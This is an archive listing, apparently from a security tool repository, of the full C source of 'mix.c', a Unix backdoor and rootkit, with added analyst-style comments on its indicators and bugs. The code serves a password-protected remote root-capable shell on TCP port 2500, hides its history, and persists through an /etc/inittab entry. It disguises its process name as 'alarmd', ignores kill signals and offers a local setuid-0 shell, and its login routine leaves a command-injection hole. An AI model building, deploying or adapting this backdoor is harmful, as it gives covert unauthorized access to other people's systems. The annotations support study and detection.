
mix.c

mix.c
Posted May 20, 2004
Authored by Serial Killah

Simple generic backdoor protected by a password that is stored as an MD5 hash. It adds itself to inittab.

tags | tool, rootkit
systems | unix
MD5 | 472a0b9ee3932c0c401d7f1c6c043625

mix.c

/* simple generic backdoor protected by a password encrypted with MD5 
* it can also give you root privileges also protected by a password encrypted with MD5
* greets to ^sq,UnPlugged,houdini,Angelboy and all my friends
* special thanks to ins1der and Lecsi for helping me when i needed and answering my questions
* for suggestion or some other stuff skilla@myway.com
*/

#include <stdio.h>
#include <signal.h>
#include <unistd.h>
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <arpa/inet.h>

/*
 * Compile-time configuration. For an analyst these constants are the
 * sample's static indicators: they appear verbatim as strings in a build
 * made from this source.
 */
/* Prompt sent to every client that connects, before any authentication. */
#define BANNER "w0rd:"
/* Defined but not referenced anywhere in this listing. */
#define MSG "Die bitch"
/* Sent to the client after a successful network login. */
#define NOTE "All commands must end with a ;\n"
/* Hex MD5 digests the supplied passwords are compared against. The author's
 * trailing comments give the plaintext, so the digest adds no secrecy here. */
#define ROOT_PWD "c2ec25302de6c6ab729dbca78b9ec9ce" // 0wned
#define ROOTME_PWD "f291caaa8226b6ccbceb9ac54ef3c03c" // w00t
/* File that install() appends its persistence line to. */
#define INIT_FILE "/etc/inittab"
/* Working directory the spawned shell is moved to. */
#define HOME_DIR "/"
/* String copied over argv[0] when started with -s. */
#define HIDE "alarmd"
/* TCP port the listener binds on all interfaces, and its listen() backlog. */
#define PORT 2500
#define BACKLOG 3

/* Forward declarations for the functions defined below. */
short int login(int fd);
void install(char *argv);
void usage(char *argv);
void rootme(char *argv,char *opt);
void backdoor(char *argv);
void child(int fd,int nfd);

/* argv and envp handed to execve(): /bin/sh with HISTFILE pointed at
 * /dev/null, so the spawned shell leaves no history file. */
char *shell[]={"/bin/sh",NULL};
char *env[]={"HISTFILE=/dev/null",NULL};

/*
 * login - password gate for one accepted connection.
 *
 * Sends BANNER, reads up to sizeof(pwd) bytes from the socket, hashes them
 * by running "/bin/echo -n <input>|/usr/bin/md5sum" through popen(), and
 * compares the first 32 bytes of output with ROOT_PWD.
 *
 * fd: connected socket.
 * Returns 1 when the digest matches (NOTE has then been sent to the client),
 * 2 otherwise. Calls exit(0) if send(), recv() or popen() fails.
 *
 * Analyst notes:
 *  - Each login attempt makes the listener spawn a shell pipeline of echo
 *    and md5sum; that parent/child pattern is a behavioural indicator.
 *  - The received bytes are placed unquoted into a shell command line
 *    before any authentication; only the characters listed in the switch
 *    below are filtered. A host running this is therefore exposed to anyone
 *    who can reach the port, not only to the password holder.
 */
short int login(int fd)
{
FILE *pipe;
int i;
char md5pwd[36],com[1024],pwd[50];

/* Zero all buffers so md5pwd stays NUL-terminated after the 32-byte fread. */
memset(&md5pwd,'\0',sizeof(md5pwd));
memset(&com,'\0',sizeof(com));
memset(&pwd,'\0',sizeof(pwd));

/* sizeof(BANNER) includes the terminating NUL, so that byte is sent too. */
if ((send(fd,BANNER,sizeof(BANNER),0))==-1)
{
perror("send()");
exit(0);
}
/* NOTE(review): recv() may fill all 50 bytes of pwd, leaving no NUL
 * terminator for the strlen() calls that follow. */
if ((recv(fd,pwd,sizeof(pwd),0))==-1)
{
perror("recv()");
exit(0);
}
/* Replace the first listed character with NUL. strlen(pwd) is re-evaluated
 * on every pass, so the string, and the loop, end at that byte. */
for (i=0;i<strlen(pwd);i++)
switch(pwd[i])
{
case '!':
case ';':
case '&':
case '>':
case '`':
case '\r':
case '\n':
pwd[i]='\0';
break;
}
/* The hash is computed by an external command rather than in-process. */
snprintf(com,sizeof(com),"/bin/echo -n %s|/usr/bin/md5sum",pwd);
if ((pipe=popen(com,"r"))==NULL)
{
perror("pipe()");
exit(0);
}
/* Read the 32 hex digits; the fread() return value is not checked. */
fread(md5pwd,32,1,pipe);
pclose(pipe);
if (!strcmp(ROOT_PWD,md5pwd))
{
if ((send(fd,NOTE,sizeof(NOTE),0))==-1)
{
perror("send()");
exit(0);
}
return 1;
}
else
return 2;
}

/*
 * install - persistence step: append a start-up line to INIT_FILE.
 *
 * argv: the program name as invoked (main passes argv[0]); it is modified
 *       in place.
 * Writes "\nbf:23:once:<cwd><argv minus its first character> -s" to
 * /etc/inittab and then calls exit(0). Also calls exit(0) if the file
 * cannot be opened for append.
 *
 * Analyst note: the persistence artefact is an inittab entry with id "bf",
 * runlevels "23", action "once", and a command ending in " -s".
 */
void install(char *argv)
{
FILE *init;
int i;
char loc[60],ini[100];

memset(&ini,'\0',sizeof(ini));
memset(&loc,'\0',sizeof(loc));
/* Current working directory; the getcwd() return value is not checked. */
getcwd(loc,sizeof(loc));

/* Shift the name left by one, dropping its first character, presumably
 * the '.' of "./name" so that cwd + "/name" forms an absolute path. */
for (i=1;i<strlen(argv);i++)
argv[i-1]=argv[i];
argv[i-1]='\0';
/* NOTE(review): each strncat() bound is the source length, not the space
 * left in loc[60] / ini[100], so a long cwd or name overruns them. */
strncat(loc,argv,strlen(argv));
strncat(ini,"bf:23:once:",11);
strncat(ini,loc,strlen(loc));
strncat(ini," -s",3);
if ((init=fopen(INIT_FILE,"a"))==NULL)
{
perror("open()");
exit(0);
}
fprintf(init,"\n%s",ini);
fclose(init);
exit(0);
}

/*
 * usage - print the option summary to stdout and exit(0).
 *
 * argv: program name shown in the "Usage:" line.
 * The fixed strings printed here are further static indicators for a
 * binary built from this source.
 */
void usage(char *argv)
{
fprintf(stdout,"Generic backdoor by sk\n");
fprintf(stdout,"Usage:%s\n\t",argv);
fprintf(stdout,"-i:install\n\t");
fprintf(stdout,"-r <password>:give root privileges\n\t");
fprintf(stdout,"-s:start\n");
fprintf(stdout,"skilla@myway.com\n");
exit(0);
}

/*
 * rootme - local mode (-r <password>): start a uid/gid 0 shell on a
 * password match.
 *
 * argv: program name, used only in the failure message.
 * opt:  the -r argument as passed by main; the body reads the getopt
 *       global optarg instead, which main passes as this same value.
 * Does not return: it either replaces the process with /bin/sh or calls
 * exit(0).
 *
 * Analyst notes:
 *  - The password is hashed by the same external echo|md5sum pipeline as in
 *    login(), so the supplied value appears in a child process's command
 *    line.
 *  - setuid(0)/setgid(0) are unchecked and presumably succeed only when the
 *    binary already runs with root privilege (e.g. installed setuid-root);
 *    an unexpected setuid-root file is the thing to look for. Confirm
 *    against how the sample was deployed.
 */
void rootme(char *argv,char *opt)
{
FILE *pipe;
char com[1024],md5pwd[36];

memset(&com,'\0',sizeof(com));
memset(&md5pwd,'\0',sizeof(md5pwd));

/* The command-line argument is placed unquoted into the shell command. */
snprintf(com,sizeof(com),"/bin/echo -n %s|/usr/bin/md5sum",optarg);
if ((pipe=popen(com,"r"))==NULL)
{
perror("pipe()");
exit(0);
}
/* Read the 32 hex digits; md5pwd was zeroed, so it stays NUL-terminated. */
fread(md5pwd,32,1,pipe);
pclose(pipe);

if (!strcmp(ROOTME_PWD,md5pwd))
{
setuid(0);
setgid(0);
/* Same shell and HISTFILE=/dev/null environment as the network path. */
execve(shell[0],shell,env);
}
else
printf("%s is out of order",argv);
/* Reached on a mismatch, or if execve() fails. */
exit(0);
}

/*
 * child - per-connection handler, run in the forked child.
 *
 * fd:  listening socket, closed here because the child does not accept.
 * nfd: connected client socket.
 * If login() returns 1, stdin, stdout and stderr are redirected to the
 * socket, the working directory becomes HOME_DIR, and the process is
 * replaced by /bin/sh. Any other login() result ends in exit(0).
 *
 * Analyst note: the runtime artefact is a /bin/sh process whose descriptors
 * 0, 1 and 2 are all the same TCP socket.
 */
void child(int fd,int nfd)
{
short int res;

close(fd);
res=login(nfd);
if (res==1)
{
dup2(nfd,0);
dup2(nfd,1);
dup2(nfd,2);
chdir(HOME_DIR);
/* NOTE(review): if execve() fails, control returns to the caller, whose
 * switch falls through from case 0 into its default branch. */
execve(shell[0],shell,env);
}
else
exit(0);
}

/*
 * backdoor - listener mode (-s): background the process and serve
 * connections on TCP PORT.
 *
 * argv: program name; not used in the body.
 * Does not return. Calls exit(0) on any socket(), bind(), listen(),
 * accept() or fork() failure.
 *
 * Analyst notes:
 *  - The network artefact is a TCP listener on 0.0.0.0:2500 that answers
 *    each new connection with BANNER.
 *  - SIGINT, SIGHUP and SIGTERM are ignored. The SIGKILL line has no
 *    effect: POSIX does not allow SIGKILL to be ignored, so the process
 *    can still be terminated that way.
 */
void backdoor(char *argv)
{
int fd,nfd;
struct sockaddr_in serv;
struct sockaddr_in cli;

signal(SIGCHLD,SIG_IGN);
signal(SIGINT,SIG_IGN);
signal(SIGKILL,SIG_IGN);
signal(SIGHUP,SIG_IGN);
signal(SIGTERM,SIG_IGN);

/* Parent exits at once; only the forked child continues. A fork()
 * failure (-1) is also non-zero and takes the same exit. */
if (fork())
exit(0);


if ((fd=socket(AF_INET,SOCK_STREAM,0))==-1)
{
perror("socket()");
exit(0);
}
/* Bind to every local IPv4 address on PORT. */
serv.sin_family=AF_INET;
serv.sin_port=htons(PORT);
serv.sin_addr.s_addr=INADDR_ANY;
memset(&(serv.sin_zero),'\0',8);

if ((bind(fd,(struct sockaddr *)&serv,sizeof(struct sockaddr_in)))==-1)
{
perror("bind()");
exit(0);
}
if ((listen(fd,BACKLOG))==-1)
{
perror("listen()");
exit(0);
}
/* Accept loop: one forked child per connection. */
for (;;)
{
int sin_size=sizeof(struct sockaddr_in);

if ((nfd=accept(fd,(struct sockaddr *)&cli,&sin_size))==-1)
{
perror("accept()");
exit(0);
}
switch(fork())
{
case -1:perror("fork()");
exit(0);
/* No break after child(): it normally ends in execve() or exit(0). */
case 0:child(fd,nfd);
/* Parent: drop its copy of the client socket, then call wait(NULL)
 * before the next accept(). */
default:close(nfd);
wait(NULL);
}
}
}

/*
 * main - parse one option and dispatch.
 *
 *   -i             install()  : add the inittab persistence line
 *   -r <password>  rootme()   : local root shell on a password match
 *   -s             backdoor() : start the network listener
 *   anything else  usage()
 *
 * Analyst note: with -s the process overwrites its own argument vector so
 * that argv[0] reads HIDE ("alarmd") and the -s argument is blanked,
 * presumably so that process listings show that name. Comparing the listed
 * command name with the executable actually mapped by the process (on
 * Linux, /proc/<pid>/exe) exposes the mismatch.
 */
int main(int argc,char *argv[])
{
int op;
/* NOTE(review): a 4-byte array initialised with 4 characters has no NUL
 * terminator, yet getopt() reads it as a string. */
char opt[4]="isr:";

/* Only the first option is parsed; getopt() is called once. */
op=getopt(argc,argv,opt);

/* The second character of argv[1] is tested directly rather than op. */
if (argc>1 && argv[1][1]=='s')
{
memset(argv[1],'\0',strlen(argv[1]));
memset(argv[0],'\0',strlen(argv[0]));
/* NOTE(review): strcpy() does not check that the original argv[0] was at
 * least as long as HIDE. */
strcpy(argv[0],HIDE);
}

switch (op)
{
case 'i':install(argv[0]);
break;
case 'r':rootme(argv[0],optarg);
break;
case 's':backdoor(argv[0]);
break;
default:usage(argv[0]);
}
}
